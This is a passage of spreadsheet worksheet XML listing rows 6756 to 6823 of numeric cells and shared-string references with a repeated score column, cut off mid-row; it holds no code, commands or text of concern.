    <row r="6756" ht="15.75" customHeight="1">
      <c r="A6756" s="1">
        <v>20172.0</v>
      </c>
      <c r="B6756" s="2">
        <v>1.0421874E7</v>
      </c>
      <c r="C6756" s="2" t="s">
        <v>6420</v>
      </c>
      <c r="D6756" s="2">
        <v>1.0</v>
      </c>
      <c r="E6756" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6756" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6757" ht="15.75" customHeight="1">
      <c r="A6757" s="1">
        <v>20776.0</v>
      </c>
      <c r="B6757" s="2">
        <v>1.4983751E7</v>
      </c>
      <c r="C6757" s="2" t="s">
        <v>6421</v>
      </c>
      <c r="D6757" s="2">
        <v>1.0</v>
      </c>
      <c r="E6757" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6757" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6758" ht="15.75" customHeight="1">
      <c r="A6758" s="1">
        <v>21064.0</v>
      </c>
      <c r="B6758" s="2">
        <v>1.784024E7</v>
      </c>
      <c r="C6758" s="2" t="s">
        <v>6422</v>
      </c>
      <c r="D6758" s="2">
        <v>1.0</v>
      </c>
      <c r="E6758" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6758" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6759" ht="15.75" customHeight="1">
      <c r="A6759" s="1">
        <v>21127.0</v>
      </c>
      <c r="B6759" s="2">
        <v>1.8373382E7</v>
      </c>
      <c r="C6759" s="2" t="s">
        <v>6423</v>
      </c>
      <c r="D6759" s="2">
        <v>1.0</v>
      </c>
      <c r="E6759" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6759" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6760" ht="15.75" customHeight="1">
      <c r="A6760" s="1">
        <v>21134.0</v>
      </c>
      <c r="B6760" s="2">
        <v>1.8468602E7</v>
      </c>
      <c r="C6760" s="2" t="s">
        <v>6424</v>
      </c>
      <c r="D6760" s="2">
        <v>1.0</v>
      </c>
      <c r="E6760" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6760" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6761" ht="15.75" customHeight="1">
      <c r="A6761" s="1">
        <v>21558.0</v>
      </c>
      <c r="B6761" s="2">
        <v>2.3670969E7</v>
      </c>
      <c r="C6761" s="2" t="s">
        <v>6425</v>
      </c>
      <c r="D6761" s="2">
        <v>1.0</v>
      </c>
      <c r="E6761" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6761" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6762" ht="15.75" customHeight="1">
      <c r="A6762" s="1">
        <v>21574.0</v>
      </c>
      <c r="B6762" s="2">
        <v>2.3808631E7</v>
      </c>
      <c r="C6762" s="2" t="s">
        <v>6426</v>
      </c>
      <c r="D6762" s="2">
        <v>1.0</v>
      </c>
      <c r="E6762" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6762" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6763" ht="15.75" customHeight="1">
      <c r="A6763" s="1">
        <v>22072.0</v>
      </c>
      <c r="B6763" s="2">
        <v>3.0596371E7</v>
      </c>
      <c r="C6763" s="2" t="s">
        <v>6427</v>
      </c>
      <c r="D6763" s="2">
        <v>1.0</v>
      </c>
      <c r="E6763" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6763" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6764" ht="15.75" customHeight="1">
      <c r="A6764" s="1">
        <v>22326.0</v>
      </c>
      <c r="B6764" s="2">
        <v>3.4089019E7</v>
      </c>
      <c r="C6764" s="2" t="s">
        <v>6428</v>
      </c>
      <c r="D6764" s="2">
        <v>1.0</v>
      </c>
      <c r="E6764" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6764" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6765" ht="15.75" customHeight="1">
      <c r="A6765" s="1">
        <v>23166.0</v>
      </c>
      <c r="B6765" s="2">
        <v>5.2018075E7</v>
      </c>
      <c r="C6765" s="2" t="s">
        <v>6429</v>
      </c>
      <c r="D6765" s="2">
        <v>1.0</v>
      </c>
      <c r="E6765" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6765" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6766" ht="15.75" customHeight="1">
      <c r="A6766" s="1">
        <v>23203.0</v>
      </c>
      <c r="B6766" s="2">
        <v>5.2519172E7</v>
      </c>
      <c r="C6766" s="2" t="s">
        <v>6430</v>
      </c>
      <c r="D6766" s="2">
        <v>1.0</v>
      </c>
      <c r="E6766" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6766" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6767" ht="15.75" customHeight="1">
      <c r="A6767" s="1">
        <v>23263.0</v>
      </c>
      <c r="B6767" s="2">
        <v>5.3205443E7</v>
      </c>
      <c r="C6767" s="2" t="s">
        <v>6431</v>
      </c>
      <c r="D6767" s="2">
        <v>1.0</v>
      </c>
      <c r="E6767" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6767" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6768" ht="15.75" customHeight="1">
      <c r="A6768" s="1">
        <v>23378.0</v>
      </c>
      <c r="B6768" s="2">
        <v>5.549196E7</v>
      </c>
      <c r="C6768" s="2" t="s">
        <v>6432</v>
      </c>
      <c r="D6768" s="2">
        <v>1.0</v>
      </c>
      <c r="E6768" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6768" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6769" ht="15.75" customHeight="1">
      <c r="A6769" s="1">
        <v>23387.0</v>
      </c>
      <c r="B6769" s="2">
        <v>5.5647195E7</v>
      </c>
      <c r="C6769" s="2" t="s">
        <v>6433</v>
      </c>
      <c r="D6769" s="2">
        <v>1.0</v>
      </c>
      <c r="E6769" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6769" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6770" ht="15.75" customHeight="1">
      <c r="A6770" s="1">
        <v>23783.0</v>
      </c>
      <c r="B6770" s="2">
        <v>7659061.0</v>
      </c>
      <c r="C6770" s="2" t="s">
        <v>6434</v>
      </c>
      <c r="D6770" s="2">
        <v>1.0</v>
      </c>
      <c r="E6770" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6770" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6771" ht="15.75" customHeight="1">
      <c r="A6771" s="1">
        <v>23970.0</v>
      </c>
      <c r="B6771" s="2">
        <v>9061392.0</v>
      </c>
      <c r="C6771" s="2" t="s">
        <v>6435</v>
      </c>
      <c r="D6771" s="2">
        <v>1.0</v>
      </c>
      <c r="E6771" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6771" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6772" ht="15.75" customHeight="1">
      <c r="A6772" s="1">
        <v>24218.0</v>
      </c>
      <c r="B6772" s="2">
        <v>1.0422571E7</v>
      </c>
      <c r="C6772" s="2" t="s">
        <v>6436</v>
      </c>
      <c r="D6772" s="2">
        <v>1.0</v>
      </c>
      <c r="E6772" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6772" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6773" ht="15.75" customHeight="1">
      <c r="A6773" s="1">
        <v>24412.0</v>
      </c>
      <c r="B6773" s="2">
        <v>1.0826076E7</v>
      </c>
      <c r="C6773" s="2" t="s">
        <v>6437</v>
      </c>
      <c r="D6773" s="2">
        <v>1.0</v>
      </c>
      <c r="E6773" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6773" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6774" ht="15.75" customHeight="1">
      <c r="A6774" s="1">
        <v>25000.0</v>
      </c>
      <c r="B6774" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C6774" s="2" t="s">
        <v>6438</v>
      </c>
      <c r="D6774" s="2">
        <v>1.0</v>
      </c>
      <c r="E6774" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6774" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6775" ht="15.75" customHeight="1">
      <c r="A6775" s="1">
        <v>25411.0</v>
      </c>
      <c r="B6775" s="2">
        <v>1.3779173E7</v>
      </c>
      <c r="C6775" s="2" t="s">
        <v>6439</v>
      </c>
      <c r="D6775" s="2">
        <v>1.0</v>
      </c>
      <c r="E6775" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6775" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6776" ht="15.75" customHeight="1">
      <c r="A6776" s="1">
        <v>25447.0</v>
      </c>
      <c r="B6776" s="2">
        <v>1.3931753E7</v>
      </c>
      <c r="C6776" s="2" t="s">
        <v>6440</v>
      </c>
      <c r="D6776" s="2">
        <v>1.0</v>
      </c>
      <c r="E6776" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6776" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6777" ht="15.75" customHeight="1">
      <c r="A6777" s="1">
        <v>25475.0</v>
      </c>
      <c r="B6777" s="2">
        <v>1.4015943E7</v>
      </c>
      <c r="C6777" s="2" t="s">
        <v>6441</v>
      </c>
      <c r="D6777" s="2">
        <v>1.0</v>
      </c>
      <c r="E6777" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6777" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6778" ht="15.75" customHeight="1">
      <c r="A6778" s="1">
        <v>25869.0</v>
      </c>
      <c r="B6778" s="2">
        <v>1.4896613E7</v>
      </c>
      <c r="C6778" s="2" t="s">
        <v>6442</v>
      </c>
      <c r="D6778" s="2">
        <v>1.0</v>
      </c>
      <c r="E6778" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6778" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6779" ht="15.75" customHeight="1">
      <c r="A6779" s="1">
        <v>25891.0</v>
      </c>
      <c r="B6779" s="2">
        <v>1.498375E7</v>
      </c>
      <c r="C6779" s="2" t="s">
        <v>6443</v>
      </c>
      <c r="D6779" s="2">
        <v>1.0</v>
      </c>
      <c r="E6779" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6779" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6780" ht="15.75" customHeight="1">
      <c r="A6780" s="1">
        <v>25905.0</v>
      </c>
      <c r="B6780" s="2">
        <v>1.506815E7</v>
      </c>
      <c r="C6780" s="2" t="s">
        <v>6444</v>
      </c>
      <c r="D6780" s="2">
        <v>1.0</v>
      </c>
      <c r="E6780" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6780" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6781" ht="15.75" customHeight="1">
      <c r="A6781" s="1">
        <v>26566.0</v>
      </c>
      <c r="B6781" s="2">
        <v>1.784844E7</v>
      </c>
      <c r="C6781" s="2" t="s">
        <v>6445</v>
      </c>
      <c r="D6781" s="2">
        <v>1.0</v>
      </c>
      <c r="E6781" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6781" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6782" ht="15.75" customHeight="1">
      <c r="A6782" s="1">
        <v>26696.0</v>
      </c>
      <c r="B6782" s="2">
        <v>1.8133686E7</v>
      </c>
      <c r="C6782" s="2" t="s">
        <v>6446</v>
      </c>
      <c r="D6782" s="2">
        <v>1.0</v>
      </c>
      <c r="E6782" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6782" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6783" ht="15.75" customHeight="1">
      <c r="A6783" s="1">
        <v>26957.0</v>
      </c>
      <c r="B6783" s="2">
        <v>1.961731E7</v>
      </c>
      <c r="C6783" s="2" t="s">
        <v>6447</v>
      </c>
      <c r="D6783" s="2">
        <v>1.0</v>
      </c>
      <c r="E6783" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6783" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6784" ht="15.75" customHeight="1">
      <c r="A6784" s="1">
        <v>26958.0</v>
      </c>
      <c r="B6784" s="2">
        <v>1.9637619E7</v>
      </c>
      <c r="C6784" s="2" t="s">
        <v>6448</v>
      </c>
      <c r="D6784" s="2">
        <v>1.0</v>
      </c>
      <c r="E6784" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6784" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6785" ht="15.75" customHeight="1">
      <c r="A6785" s="1">
        <v>27138.0</v>
      </c>
      <c r="B6785" s="2">
        <v>2.0767257E7</v>
      </c>
      <c r="C6785" s="2" t="s">
        <v>6449</v>
      </c>
      <c r="D6785" s="2">
        <v>1.0</v>
      </c>
      <c r="E6785" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6785" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6786" ht="15.75" customHeight="1">
      <c r="A6786" s="1">
        <v>27161.0</v>
      </c>
      <c r="B6786" s="2">
        <v>2.0812903E7</v>
      </c>
      <c r="C6786" s="2" t="s">
        <v>6450</v>
      </c>
      <c r="D6786" s="2">
        <v>1.0</v>
      </c>
      <c r="E6786" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6786" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6787" ht="15.75" customHeight="1">
      <c r="A6787" s="1">
        <v>27178.0</v>
      </c>
      <c r="B6787" s="2">
        <v>2.0866665E7</v>
      </c>
      <c r="C6787" s="2" t="s">
        <v>6451</v>
      </c>
      <c r="D6787" s="2">
        <v>1.0</v>
      </c>
      <c r="E6787" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6787" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6788" ht="15.75" customHeight="1">
      <c r="A6788" s="1">
        <v>27247.0</v>
      </c>
      <c r="B6788" s="2">
        <v>2.1054836E7</v>
      </c>
      <c r="C6788" s="2" t="s">
        <v>6452</v>
      </c>
      <c r="D6788" s="2">
        <v>1.0</v>
      </c>
      <c r="E6788" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6788" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6789" ht="15.75" customHeight="1">
      <c r="A6789" s="1">
        <v>27367.0</v>
      </c>
      <c r="B6789" s="2">
        <v>2.167744E7</v>
      </c>
      <c r="C6789" s="2" t="s">
        <v>6453</v>
      </c>
      <c r="D6789" s="2">
        <v>1.0</v>
      </c>
      <c r="E6789" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6789" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6790" ht="15.75" customHeight="1">
      <c r="A6790" s="1">
        <v>27587.0</v>
      </c>
      <c r="B6790" s="2">
        <v>2.2542472E7</v>
      </c>
      <c r="C6790" s="2" t="s">
        <v>6454</v>
      </c>
      <c r="D6790" s="2">
        <v>1.0</v>
      </c>
      <c r="E6790" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6790" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6791" ht="15.75" customHeight="1">
      <c r="A6791" s="1">
        <v>27876.0</v>
      </c>
      <c r="B6791" s="2">
        <v>2.354899E7</v>
      </c>
      <c r="C6791" s="2" t="s">
        <v>6455</v>
      </c>
      <c r="D6791" s="2">
        <v>1.0</v>
      </c>
      <c r="E6791" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6791" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6792" ht="15.75" customHeight="1">
      <c r="A6792" s="1">
        <v>27899.0</v>
      </c>
      <c r="B6792" s="2">
        <v>2.3670968E7</v>
      </c>
      <c r="C6792" s="2" t="s">
        <v>6425</v>
      </c>
      <c r="D6792" s="2">
        <v>1.0</v>
      </c>
      <c r="E6792" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6792" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6793" ht="15.75" customHeight="1">
      <c r="A6793" s="1">
        <v>27950.0</v>
      </c>
      <c r="B6793" s="2">
        <v>2.3856112E7</v>
      </c>
      <c r="C6793" s="2" t="s">
        <v>6456</v>
      </c>
      <c r="D6793" s="2">
        <v>1.0</v>
      </c>
      <c r="E6793" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6793" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6794" ht="15.75" customHeight="1">
      <c r="A6794" s="1">
        <v>27970.0</v>
      </c>
      <c r="B6794" s="2">
        <v>2.3962469E7</v>
      </c>
      <c r="C6794" s="2" t="s">
        <v>6457</v>
      </c>
      <c r="D6794" s="2">
        <v>1.0</v>
      </c>
      <c r="E6794" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6794" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6795" ht="15.75" customHeight="1">
      <c r="A6795" s="1">
        <v>27974.0</v>
      </c>
      <c r="B6795" s="2">
        <v>2.399577E7</v>
      </c>
      <c r="C6795" s="2" t="s">
        <v>6458</v>
      </c>
      <c r="D6795" s="2">
        <v>1.0</v>
      </c>
      <c r="E6795" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6795" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6796" ht="15.75" customHeight="1">
      <c r="A6796" s="1">
        <v>28178.0</v>
      </c>
      <c r="B6796" s="2">
        <v>2.4991644E7</v>
      </c>
      <c r="C6796" s="2" t="s">
        <v>6459</v>
      </c>
      <c r="D6796" s="2">
        <v>1.0</v>
      </c>
      <c r="E6796" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6796" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6797" ht="15.75" customHeight="1">
      <c r="A6797" s="1">
        <v>28257.0</v>
      </c>
      <c r="B6797" s="2">
        <v>2.5348471E7</v>
      </c>
      <c r="C6797" s="2" t="s">
        <v>6453</v>
      </c>
      <c r="D6797" s="2">
        <v>1.0</v>
      </c>
      <c r="E6797" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6797" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6798" ht="15.75" customHeight="1">
      <c r="A6798" s="1">
        <v>28419.0</v>
      </c>
      <c r="B6798" s="2">
        <v>2.6388112E7</v>
      </c>
      <c r="C6798" s="2" t="s">
        <v>6460</v>
      </c>
      <c r="D6798" s="2">
        <v>1.0</v>
      </c>
      <c r="E6798" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6798" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6799" ht="15.75" customHeight="1">
      <c r="A6799" s="1">
        <v>28434.0</v>
      </c>
      <c r="B6799" s="2">
        <v>2.647793E7</v>
      </c>
      <c r="C6799" s="2" t="s">
        <v>6461</v>
      </c>
      <c r="D6799" s="2">
        <v>1.0</v>
      </c>
      <c r="E6799" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6799" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6800" ht="15.75" customHeight="1">
      <c r="A6800" s="1">
        <v>28714.0</v>
      </c>
      <c r="B6800" s="2">
        <v>2.7829048E7</v>
      </c>
      <c r="C6800" s="2" t="s">
        <v>6462</v>
      </c>
      <c r="D6800" s="2">
        <v>1.0</v>
      </c>
      <c r="E6800" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6800" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6801" ht="15.75" customHeight="1">
      <c r="A6801" s="1">
        <v>28728.0</v>
      </c>
      <c r="B6801" s="2">
        <v>2.7958679E7</v>
      </c>
      <c r="C6801" s="2" t="s">
        <v>6437</v>
      </c>
      <c r="D6801" s="2">
        <v>1.0</v>
      </c>
      <c r="E6801" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6801" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6802" ht="15.75" customHeight="1">
      <c r="A6802" s="1">
        <v>28867.0</v>
      </c>
      <c r="B6802" s="2">
        <v>2.9074743E7</v>
      </c>
      <c r="C6802" s="2" t="s">
        <v>6463</v>
      </c>
      <c r="D6802" s="2">
        <v>1.0</v>
      </c>
      <c r="E6802" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6802" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6803" ht="15.75" customHeight="1">
      <c r="A6803" s="1">
        <v>29031.0</v>
      </c>
      <c r="B6803" s="2">
        <v>3.0108197E7</v>
      </c>
      <c r="C6803" s="2" t="s">
        <v>6464</v>
      </c>
      <c r="D6803" s="2">
        <v>1.0</v>
      </c>
      <c r="E6803" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6803" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6804" ht="15.75" customHeight="1">
      <c r="A6804" s="1">
        <v>29153.0</v>
      </c>
      <c r="B6804" s="2">
        <v>3.059637E7</v>
      </c>
      <c r="C6804" s="2" t="s">
        <v>6427</v>
      </c>
      <c r="D6804" s="2">
        <v>1.0</v>
      </c>
      <c r="E6804" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6804" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6805" ht="15.75" customHeight="1">
      <c r="A6805" s="1">
        <v>29202.0</v>
      </c>
      <c r="B6805" s="2">
        <v>3.0766178E7</v>
      </c>
      <c r="C6805" s="2" t="s">
        <v>6465</v>
      </c>
      <c r="D6805" s="2">
        <v>1.0</v>
      </c>
      <c r="E6805" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6805" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6806" ht="15.75" customHeight="1">
      <c r="A6806" s="1">
        <v>29297.0</v>
      </c>
      <c r="B6806" s="2">
        <v>3.1201294E7</v>
      </c>
      <c r="C6806" s="2" t="s">
        <v>6466</v>
      </c>
      <c r="D6806" s="2">
        <v>1.0</v>
      </c>
      <c r="E6806" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6806" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6807" ht="15.75" customHeight="1">
      <c r="A6807" s="1">
        <v>29399.0</v>
      </c>
      <c r="B6807" s="2">
        <v>3.1958058E7</v>
      </c>
      <c r="C6807" s="2" t="s">
        <v>6467</v>
      </c>
      <c r="D6807" s="2">
        <v>1.0</v>
      </c>
      <c r="E6807" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6807" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6808" ht="15.75" customHeight="1">
      <c r="A6808" s="1">
        <v>29584.0</v>
      </c>
      <c r="B6808" s="2">
        <v>3.3507844E7</v>
      </c>
      <c r="C6808" s="2" t="s">
        <v>1551</v>
      </c>
      <c r="D6808" s="2">
        <v>1.0</v>
      </c>
      <c r="E6808" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6808" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6809" ht="15.75" customHeight="1">
      <c r="A6809" s="1">
        <v>29684.0</v>
      </c>
      <c r="B6809" s="2">
        <v>3.4089018E7</v>
      </c>
      <c r="C6809" s="2" t="s">
        <v>6428</v>
      </c>
      <c r="D6809" s="2">
        <v>1.0</v>
      </c>
      <c r="E6809" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6809" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6810" ht="15.75" customHeight="1">
      <c r="A6810" s="1">
        <v>29686.0</v>
      </c>
      <c r="B6810" s="2">
        <v>3.4089018E7</v>
      </c>
      <c r="C6810" s="2" t="s">
        <v>6468</v>
      </c>
      <c r="D6810" s="2">
        <v>1.0</v>
      </c>
      <c r="E6810" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6810" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6811" ht="15.75" customHeight="1">
      <c r="A6811" s="1">
        <v>30353.0</v>
      </c>
      <c r="B6811" s="2">
        <v>3.82462E7</v>
      </c>
      <c r="C6811" s="2" t="s">
        <v>6469</v>
      </c>
      <c r="D6811" s="2">
        <v>1.0</v>
      </c>
      <c r="E6811" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6811" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6812" ht="15.75" customHeight="1">
      <c r="A6812" s="1">
        <v>31656.0</v>
      </c>
      <c r="B6812" s="2">
        <v>5.1672433E7</v>
      </c>
      <c r="C6812" s="2" t="s">
        <v>6470</v>
      </c>
      <c r="D6812" s="2">
        <v>1.0</v>
      </c>
      <c r="E6812" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6812" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6813" ht="15.75" customHeight="1">
      <c r="A6813" s="1">
        <v>31826.0</v>
      </c>
      <c r="B6813" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C6813" s="2" t="s">
        <v>6471</v>
      </c>
      <c r="D6813" s="2">
        <v>1.0</v>
      </c>
      <c r="E6813" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6813" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6814" ht="15.75" customHeight="1">
      <c r="A6814" s="1">
        <v>31865.0</v>
      </c>
      <c r="B6814" s="2">
        <v>5285022.0</v>
      </c>
      <c r="C6814" s="2" t="s">
        <v>6472</v>
      </c>
      <c r="D6814" s="2">
        <v>1.0</v>
      </c>
      <c r="E6814" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6814" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6815" ht="15.75" customHeight="1">
      <c r="A6815" s="1">
        <v>32054.0</v>
      </c>
      <c r="B6815" s="2">
        <v>5.3766124E7</v>
      </c>
      <c r="C6815" s="2" t="s">
        <v>6473</v>
      </c>
      <c r="D6815" s="2">
        <v>1.0</v>
      </c>
      <c r="E6815" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6815" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6816" ht="15.75" customHeight="1">
      <c r="A6816" s="1">
        <v>32103.0</v>
      </c>
      <c r="B6816" s="2">
        <v>5.406267E7</v>
      </c>
      <c r="C6816" s="2" t="s">
        <v>6474</v>
      </c>
      <c r="D6816" s="2">
        <v>1.0</v>
      </c>
      <c r="E6816" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6816" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6817" ht="15.75" customHeight="1">
      <c r="A6817" s="1">
        <v>32741.0</v>
      </c>
      <c r="B6817" s="2">
        <v>6034558.0</v>
      </c>
      <c r="C6817" s="2" t="s">
        <v>6475</v>
      </c>
      <c r="D6817" s="2">
        <v>1.0</v>
      </c>
      <c r="E6817" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6817" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6818" ht="15.75" customHeight="1">
      <c r="A6818" s="1">
        <v>33387.0</v>
      </c>
      <c r="B6818" s="2">
        <v>7659060.0</v>
      </c>
      <c r="C6818" s="2" t="s">
        <v>6434</v>
      </c>
      <c r="D6818" s="2">
        <v>1.0</v>
      </c>
      <c r="E6818" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6818" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6819" ht="15.75" customHeight="1">
      <c r="A6819" s="1">
        <v>33684.0</v>
      </c>
      <c r="B6819" s="2">
        <v>8434282.0</v>
      </c>
      <c r="C6819" s="2" t="s">
        <v>6476</v>
      </c>
      <c r="D6819" s="2">
        <v>1.0</v>
      </c>
      <c r="E6819" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6819" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6820" ht="15.75" customHeight="1">
      <c r="A6820" s="1">
        <v>33861.0</v>
      </c>
      <c r="B6820" s="2">
        <v>9061391.0</v>
      </c>
      <c r="C6820" s="2" t="s">
        <v>6435</v>
      </c>
      <c r="D6820" s="2">
        <v>1.0</v>
      </c>
      <c r="E6820" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6820" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6821" ht="15.75" customHeight="1">
      <c r="A6821" s="1">
        <v>34164.0</v>
      </c>
      <c r="B6821" s="2">
        <v>9906493.0</v>
      </c>
      <c r="C6821" s="2" t="s">
        <v>6477</v>
      </c>
      <c r="D6821" s="2">
        <v>1.0</v>
      </c>
      <c r="E6821" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6821" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6822" ht="15.75" customHeight="1">
      <c r="A6822" s="1">
        <v>3758.0</v>
      </c>
      <c r="B6822" s="2">
        <v>3.9755785E7</v>
      </c>
      <c r="C6822" s="2" t="s">
        <v>6478</v>
      </c>
      <c r="D6822" s="2">
        <v>1.0</v>
      </c>
      <c r="E6822" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6822" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="6823" ht="15.75" customHeight="1">
